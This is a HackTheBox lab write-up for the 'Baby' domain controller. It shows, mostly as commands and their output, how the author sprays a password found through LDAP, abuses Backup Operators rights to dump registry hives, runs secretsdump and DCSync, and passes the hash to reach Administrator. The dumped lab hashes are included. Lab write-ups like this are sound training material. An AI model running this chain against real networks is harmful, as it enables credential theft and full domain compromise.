HackTheBox - Baby

Updated 29-03-2026
#htb #ctf #writeup #windows #ldapsearch #crackmapexec #smbpasswd #evil-winrm #impacket-secretsdump #baby

A Windows domain controller where anonymous LDAP enumeration surfaces a first credential — and a built-in backup privilege allows reading registry hives directly, leading to a full domain compromise.

Tools

  • ldapsearch
  • crackmapexec
  • smbpasswd
  • evil-winrm
  • impacket-secretsdump

Getting User

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985 10.129.234.71
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-28 03:28 EST
Nmap scan report for 10.129.234.71
Host is up (0.13s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-28 08:29:05Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-28T08:29:12+00:00
|_ssl-date: 2026-01-28T08:29:52+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2026-01-27T06:13:00
|_Not valid after:  2026-07-29T06:13:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-28T08:29:13
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.51 seconds


Foothold

add domain name and the dcs’s to hosts file

1
echo "10.129.234.71 baby.vl BabyDC.baby.vl" | sudo tee -a /etc/hosts

using ldapsearch i was able to find this description which shows an initial password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H ldap://babydc.baby.vl -b "dc=baby,dc=vl"

-------------SNIP-----------
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
-------------SNIP-----------

I tested the credentials to login with Teresa.Bell with crackmapexec but credentials failed
I created a users.txt to try the password on the users I found

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -b "dc=baby,dc=vl" "(objectClass=user)" -H ldap://babydc.baby.vl | grep sAMAccountName
sAMAccountName: Guest
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
1
crackmapexec smb 10.129.234.71 -u it_users.txt -p 'BabyStart123!' --continue-on-success

but it wasn’t successful also

i found more accounts by using grep to view only the dn (Distinguished Name) which shows us the CN (Common Names) of the objects

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -b "dc=baby,dc=vl" -H ldap://babydc.baby.vl | grep dn: 
dn: DC=baby,DC=vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

I’m going to save the output of CN to allusers.txt, also removing the spaces and replacing them with .

1
2
3
4
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -b "dc=baby,dc=vl" -H ldap://BabyDC.baby.vl \
| grep "^dn:" \
| sed -n 's/^dn: CN=\([^,]*\).*/\1/p' | tr ' ' '.' > users.txt

Going to try smbmapexec again against all the users

I got a hit, the password belongs to Caroline.Robinson
but I have to change the user’s password

1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.129.234.71 -u users.txt -p 'BabyStart123!' --continue-on-success

SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
-----------SNIP-------------
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

I changed the password to BabyStart321! using smbpasswd

1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ smbpasswd -r baby.vl -U Caroline.Robinson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson

Now I am able to login using evil-winrm to get the user flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i baby.vl -u caroline.robinson -p 'BabyStart321!' 

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> ls


    Directory: C:\Users\Caroline.Robinson\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         1/28/2026   6:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cat user.txt


Getting Root

Information Gathering

First I checked user privileges

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

I see that i’m in this group BUILTIN\Backup Operators and have the following privileges

1
2
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled

I save sam and lsa secrets using impacket-reg on the target’s machine

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ impacket-reg Caroline.Robinson:BabyStart321\!@baby.vl save -keyName HKLM\\security -o C:/ProgramData     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\security to C:/ProgramData\security.save
                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ impacket-reg Caroline.Robinson:BabyStart321\!@baby.vl save -keyName HKLM\\sam -o C:/ProgramData
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\sam to C:/ProgramData\sam.save
                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ impacket-reg Caroline.Robinson:BabyStart321\!@baby.vl save -keyName HKLM\\system -o C:/ProgramData
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\system to C:/ProgramData\system.save

I downloaded them using evil-wirnm

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\programdata> download sam.save
                                        
Info: Downloading C:\programdata\sam.save to sam.save
                                        
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download security.save
                                        
Info: Downloading C:\programdata\security.save to security.save
                                        
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download system.save
                                        
Info: Downloading C:\programdata\system.save to system.save

next, I dumped the secrets using impacket-secretsdump 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:0d43eb797b84b0b440fbcb0d89fea14f8458970482b891850f2d2106c7c08447f2aa725adc71c58241311e5cebf5b75d43f5b541a43d583665ea4669bee9d1910c4ee1f4703104fccf44eb3ac2b3bb31ed1712e4fca7e416d3bd561993cd88a9750b0a04466909e51660a3fec061e9f5a51e8e10fe8c2653cd610140611ea9cd2fc1f436829369373bfb51fc5214666a9073e7a8124f4a07414ee0a7e565f24745f2ec5f134e7b7dca577813e5e82867ea33b16a1797c51703731eb1e4273db597063d62cb7f1c1a0faae15ab06aadea286b87cf6f2d28127fb948113c6b57c92a97c1aad038f958404b27f6e6d6fba5
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe620195f1a5e2d71842bbad9877d7c3ca8a31eda
dpapi_userkey:0x026920834cd39c2e8ba9401c44a8869fe6be0555
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...

I tried to login to administrator using the administrator hash but failed, then tried it against the users.txt, which also failed

1
2
3
4
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb baby.vl -u administrator -H '8d992faed38128ae85e95fa35868bb43'
SMB         baby.vl         445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         baby.vl         445    BABYDC           [-] baby.vl\administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE

then I tried the hash of the machine account and it was correct

1
2
3
4
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb baby.vl -u BABYDC$ -H 3d538eabff6633b62dbaa5fb5ade3b4d
SMB         baby.vl         445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         baby.vl         445    BABYDC           [+] baby.vl\BABYDC$:3d538eabff6633b62dbaa5fb5ade3b4d

Privilege Escalation

now I’ll dump sam and lsa secrets of the machine account using the hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump baby.vl/BABYDC\$@baby.vl -hashes :3d538eabff6633b62dbaa5fb5ade3b4d
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:e353a649ad6faa803f2ac62b14d90c22:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
-------------SNIP---------------

I tested the administrator’s hash against all the users and got a hit the administrator account

1
2
3
4
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb baby.vl -u users.txt -H ee4457ae59f1e3fbd764e33d9cef123d    
SMB         baby.vl         445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         baby.vl         445    BABYDC           [+] baby.vl\Administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)

logged in using evil-winrm and I am now able to get the root flag

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i baby.vl -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ~/Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt